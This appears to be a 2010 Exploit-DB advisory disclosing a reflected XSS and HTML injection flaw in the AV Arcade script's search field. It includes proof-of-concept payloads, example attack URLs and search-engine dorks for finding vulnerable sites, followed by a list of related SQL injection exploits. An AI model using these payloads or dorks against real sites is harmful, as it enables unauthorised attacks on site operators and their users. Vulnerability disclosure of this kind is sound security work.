# Exploit Title: AV Arcade Search Field XSS/HTML Injection # Date: 6/5/2010 # Author: Vadim Toptunov, http://www.twitter.com/pentesting # Software Link: http://www.avscripts.net/avarcade/ # Version: 5.1.4 Free and Pro (latest) and prior # Tested on: Any NIX # CVE : N/a # Code : below Description: AV arcade is a free arcade script from AV Scripts. It has features which easily match those of paid scripts. POC: Go to search field and query those strings: HTML Injection: "><marquee>hey, this works!</marquee> XSS: "><script>alert(String.fromCharCode(88,83,83))</script> Example: http://[site]/index.php?task=search&q="><marquee>hey, thisworks!</marquee> http://[site]/index.php?task=search&q="><script>alert(String.fromCharCode(88,83,83))</script> Dorks: "Powered by AV Arcade v3" "Powered by AV Arcade v4" "Powered by AV Arcade Free Edition" "Powered by AV Arcade Pro"
Related ExploitsTrying to match OSVDBs (1): 64438
Other Possible E-DB Search Terms: AV Arcade
|2007-07-02||4138||AV Arcade 2.1b - (index.php id) SQL Injection||Kw3[R]Ln|
|2010-07-28||14494||AV Arcade 3 - Cookie SQL Injection Authentication Bypass||saudi0hacker|
|2012-09-02||21007||AV Arcade Free Edition - 'add_rating.php id Parameter' Blind SQL Injection||DaOne|